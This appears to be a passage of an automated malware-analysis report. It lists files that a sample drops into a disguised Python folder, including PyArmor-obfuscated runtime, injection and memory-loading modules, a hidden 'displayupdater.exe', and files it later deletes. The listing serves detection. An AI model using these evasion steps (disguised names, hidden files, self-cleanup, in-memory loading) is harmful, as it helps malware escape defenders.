%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\crypt32.cpython-311.pyc.2012750052400
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cryptui.cpython-311.pyc.2012749878640
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dbghelp.cpython-311.pyc.2012749879280
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dnsapi.cpython-311.pyc.2012745310704
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\iphlpapi.cpython-311.pyc.2012725784656
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\kernel32.cpython-311.pyc.2012725785888
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ktmw32.cpython-311.pyc.2012745696560
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ntdll.cpython-311.pyc.2012745698640
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\netapi32.cpython-311.pyc.2012742935360
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ole32.cpython-311.pyc.2012745018832
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleaut32.cpython-311.pyc.2012742927088
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleacc.cpython-311.pyc.2012745451760
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\psapi.cpython-311.pyc.2012745452400
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\setupapi.cpython-311.pyc.2012742935712
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shell32.cpython-311.pyc.2012745461360
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shlwapi.cpython-311.pyc.2012745463920
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\tdh.cpython-311.pyc.2012745465520
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\user32.cpython-311.pyc.2012744974704
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\version.cpython-311.pyc.2012744985744
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\virtdisk.cpython-311.pyc.2012742932544
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wevtapi.cpython-311.pyc.2012744942576
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\winhttp.cpython-311.pyc.2012744954096
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wininet.cpython-311.pyc.2012744844432
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wintrust.cpython-311.pyc.2012742940816
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ws2_32.cpython-311.pyc.2012744859472
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\__init__.cpython-311.pyc.2012725763472
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system.cpython-311.pyc.2012744859472
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\__init__.cpython-311.pyc.2012745882864
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\pythonutils.cpython-311.pyc.2012745883344
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\dbgprint.cpython-311.pyc.2012745884144
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\winutils.cpython-311.pyc.2012750875504
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\improved_buffer.cpython-311.pyc.2012750887024
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\process.cpython-311.pyc.2012750887024
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\__init__.cpython-311.pyc.2012750972208
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\native_function.cpython-311.pyc.2012750118592
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x86.cpython-311.pyc.2012750117536
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x64.cpython-311.pyc.2012751925952
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\remotectypes.cpython-311.pyc.2012750970928
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\injection.cpython-311.pyc.2012751690320
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\nativeutils.cpython-311.pyc.2012751932640
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\pe_parse.cpython-311.pyc.2012751826256
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\hooks.cpython-311.pyc.2012751017808
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\meta.cpython-311.pyc.2012751828016
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\exception.cpython-311.pyc.2012751837776
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\apisetmap.cpython-311.pyc.2012774880784
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\token.cpython-311.pyc.2012774885104
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\security.cpython-311.pyc.2012775028240
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\network.cpython-311.pyc.2012750974128
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\com.cpython-311.pyc.2012774838704
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\registry.cpython-311.pyc.2012773766672
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\service.cpython-311.pyc.2012773845072
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\volume.cpython-311.pyc.2012773848432
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\wmi.cpython-311.pyc.2012773850832
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\object_manager.cpython-311.pyc.2012774801536
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\device_manager.cpython-311.pyc.2012774803648
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\handle.cpython-311.pyc.2012774075088
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_log.cpython-311.pyc.2012774079568
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_trace.cpython-311.pyc.2012773298096
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\task_scheduler.cpython-311.pyc.2012770238864
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system_module.cpython-311.pyc.2012770239920
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\bits.cpython-311.pyc.2012773232080
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\file.cpython-311.pyc.2012770445360
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\wintrust.cpython-311.pyc.2012770447120
%LOCALAPPDATA%\programs\python\python318\windows\__pycache__\syswow64.cpython-311.pyc.2012770449840
%APPDATA%\t_id.txt
%LOCALAPPDATA%\programs\python\python399\python.zip
%APPDATA%\displayupdater.exe
nul

Sets the 'hidden' attribute to the following files

%APPDATA%\t_id.txt
%APPDATA%\displayupdater.exe

Deletes following files that it created itself

%TEMP%\nwg134.tmp
%LOCALAPPDATA%\programs\python\python318\exec.py
%LOCALAPPDATA%\programs\python\python318\libcrypto-3.dll
%LOCALAPPDATA%\programs\python\python318\libffi-8.dll
%LOCALAPPDATA%\programs\python\python318\libssl-3.dll
%LOCALAPPDATA%\programs\python\python318\license.txt
%LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\pyarmor_runtime.pyd
%LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\__init__.py
%LOCALAPPDATA%\programs\python\python318\pyarmor_runtime_005724\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pyexpat.pyd
%LOCALAPPDATA%\programs\python\python318\python.cat
%LOCALAPPDATA%\programs\python\python318\python.exe
%LOCALAPPDATA%\programs\python\python318\python3.dll
%LOCALAPPDATA%\programs\python\python318\python311.dll
%LOCALAPPDATA%\programs\python\python318\python311.zip
%LOCALAPPDATA%\programs\python\python318\python311._pth
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\oleaut32.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\ws2_32.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__init__.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\oleaut32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\oleaut32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\ws2_32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\ws2_32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\ordlookup\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\pefile.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__init__.py
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\pefile.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\pefile.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\pythonmemorymodule\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\pythonw.exe
%LOCALAPPDATA%\programs\python\python318\select.pyd
%LOCALAPPDATA%\programs\python\python318\sqlite3.dll
%LOCALAPPDATA%\programs\python\python318\unicodedata.pyd
%LOCALAPPDATA%\programs\python\python318\vcruntime140.dll
%LOCALAPPDATA%\programs\python\python318\vcruntime140_1.dll
%LOCALAPPDATA%\programs\python\python318\windows\alpc.py
%LOCALAPPDATA%\programs\python\python318\windows\com.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\catalog.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\certificate.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\cryptmsg.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\dpapi.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\encrypt_decrypt.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\generation.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\sign_verify.py
%LOCALAPPDATA%\programs\python\python318\windows\crypto\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\dbgprint.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\breakpoints.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\debugger.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\localdbg.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\symboldbg.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\symbols.py
%LOCALAPPDATA%\programs\python\python318\windows\debug\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\auto_doc_tst.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\flag.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\interfaces.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\meta.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\ntstatus.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\windef.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\winerror.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\winfuncs.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\winstructs.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\flag.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\flag.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\interfaces.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\interfaces.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\meta.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\meta.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\ntstatus.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\ntstatus.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\windef.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\windef.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winerror.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winerror.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winfuncs.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winfuncs.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winstructs.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\winstructs.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\generated_def\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\hooks.py
%LOCALAPPDATA%\programs\python\python318\windows\injection.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\cpuid.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\nativeutils.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\native_function.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\simple_x64.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\simple_x86.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\nativeutils.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\nativeutils.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\native_function.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\native_function.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x64.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x64.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x86.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\simple_x86.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\native_exec\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\pe_parse.py
%LOCALAPPDATA%\programs\python\python318\windows\pipe.py
%LOCALAPPDATA%\programs\python\python318\windows\pycompat.py
%LOCALAPPDATA%\programs\python\python318\windows\remotectypes.py
%LOCALAPPDATA%\programs\python\python318\windows\rpc\client.py
%LOCALAPPDATA%\programs\python\python318\windows\rpc\epmapper.py
%LOCALAPPDATA%\programs\python\python318\windows\rpc\ndr.py
%LOCALAPPDATA%\programs\python\python318\windows\rpc\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\security.py
%LOCALAPPDATA%\programs\python\python318\windows\syswow64.py
%LOCALAPPDATA%\programs\python\python318\windows\test.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\improved_buffer.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\pythonutils.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\winutils.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\improved_buffer.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\improved_buffer.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\pythonutils.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\pythonutils.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\winutils.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\winutils.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\utils\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\apisetmap.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\bits.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\device_manager.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\event_log.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\event_trace.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\exception.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\file.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\handle.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\network.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\object_manager.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\process.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\registry.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\service.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\system.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\system_module.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\task_scheduler.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\token.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\volume.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\wmi.py
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\apisetmap.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\apisetmap.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\bits.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\bits.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\device_manager.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\device_manager.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_log.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_log.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_trace.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\event_trace.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\exception.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\exception.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\file.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\file.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\handle.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\handle.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\network.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\network.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\object_manager.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\object_manager.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\process.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\process.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\registry.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\registry.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\service.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\service.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system_module.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\system_module.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\task_scheduler.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\task_scheduler.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\token.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\token.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\volume.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\volume.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\wmi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\wmi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\__init__.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winobject\__pycache__\__init__.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apiproxy.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\advapi32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\cfgmgr32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\crypt32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\cryptui.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\dbghelp.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\dnsapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\iphlpapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\kernel32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\ktmw32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\netapi32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\ntdll.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\ole32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\oleacc.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\oleaut32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\psapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\setupapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\shell32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\shlwapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\tdh.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\user32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\version.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\virtdisk.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\wevtapi.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\winhttp.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\wininet.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\wintrust.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\ws2_32.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__init__.py
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\advapi32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\advapi32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cfgmgr32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cfgmgr32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\crypt32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\crypt32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cryptui.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\cryptui.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dbghelp.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dbghelp.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dnsapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\dnsapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\iphlpapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\iphlpapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\kernel32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\kernel32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ktmw32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ktmw32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\netapi32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\netapi32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ntdll.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ntdll.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ole32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\ole32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleacc.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleacc.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleaut32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\oleaut32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\psapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\psapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\setupapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\setupapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shell32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shell32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shlwapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\shlwapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\tdh.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\tdh.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\user32.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\user32.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\version.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\version.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\virtdisk.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\virtdisk.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wevtapi.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wevtapi.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\winhttp.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\winhttp.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wininet.cpython-311.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wininet.cpython-313.pyc
%LOCALAPPDATA%\programs\python\python318\windows\winproxy\apis\__pycache__\wintrust.cpython-311.pyc
